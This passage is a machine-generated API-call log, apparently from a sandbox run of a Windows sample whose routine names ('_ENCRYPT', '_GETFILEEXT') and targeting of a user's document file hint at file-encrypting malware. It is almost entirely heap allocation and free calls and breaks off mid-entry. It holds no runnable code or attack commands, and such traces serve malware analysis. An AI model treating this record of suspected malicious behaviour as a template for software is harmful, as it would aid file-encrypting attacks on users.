[0172.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0172.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0172.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0172.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0172.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0172.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0172.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0172.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0172.625] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xa5f008, cbMultiByte=81, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 81 [0172.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa2) returned 0x8fcbc0 [0172.625] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xa5f008, cbMultiByte=81, lpWideCharStr=0x8fcbc0, cchWideChar=81 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\oxnDwHiXTyJqTe06unb5.xls") returned 81 [0172.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0172.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6cd8 [0172.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fcbc0 | out: hHeap=0x8a0000) returned 1 [0172.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa5f008 | out: hHeap=0x8a0000) returned 1 [0172.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0172.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0172.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0172.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0172.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0172.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0172.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0172.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0172.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0172.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0172.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0172.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0172.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0172.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0172.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0172.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0172.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0172.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0172.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0172.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0172.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0172.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0172.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0172.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0172.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0172.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0172.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0172.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0172.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0172.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0172.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0172.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0172.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0172.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0172.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0172.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0172.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0172.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0172.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0172.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0172.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0172.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0172.627] FreeLibrary (hLibModule=0x75990000) returned 1 [0172.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0172.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0172.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0172.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0172.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0172.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0172.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0172.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0172.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0172.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0172.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0172.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0172.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0172.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0172.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0172.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0172.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0172.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0172.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0172.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0172.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0172.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0172.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0172.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0172.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0172.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0172.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0172.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0172.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0172.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0172.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0172.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0172.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0172.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0172.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0172.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0172.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0172.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0172.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0172.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0172.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0172.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0172.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0172.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0172.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0172.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0172.629] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0172.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0172.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0172.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0172.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0172.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0172.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0172.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0172.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0172.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0172.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0172.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0172.629] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0172.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0172.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0172.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0172.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0172.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0172.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0172.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0172.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0172.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0172.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0172.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0172.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0172.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0172.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0172.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0172.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0172.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0172.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0172.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0172.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0172.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0172.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0172.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0172.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0172.630] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0172.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0172.631] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0172.631] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0172.631] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0172.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0172.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0172.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0172.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0172.631] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0172.631] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0172.631] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0172.631] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0172.631] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0172.631] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0172.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0172.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0172.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0172.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0172.631] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0172.631] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0172.631] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0172.631] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0172.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd888 [0172.632] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd888, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0172.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0172.632] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0172.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0172.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0172.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0172.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0172.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0172.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0172.632] CloseHandle (hObject=0x120) returned 1 [0172.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0172.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0172.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0172.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0172.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0172.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0172.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0172.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0172.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0172.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0172.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0172.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0172.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0172.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0172.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0172.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0172.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0172.633] FreeLibrary (hLibModule=0x75990000) returned 1 [0172.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0172.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0172.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0172.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0172.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0172.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0172.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0172.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0172.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0172.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0172.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0172.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0172.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0172.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0172.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0172.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0172.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0172.634] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0172.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0172.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0172.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0172.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0172.634] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0172.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0172.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0172.634] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0172.634] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0172.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0172.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0172.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0172.634] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0172.634] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0172.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0172.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0172.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0172.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0172.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0172.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, 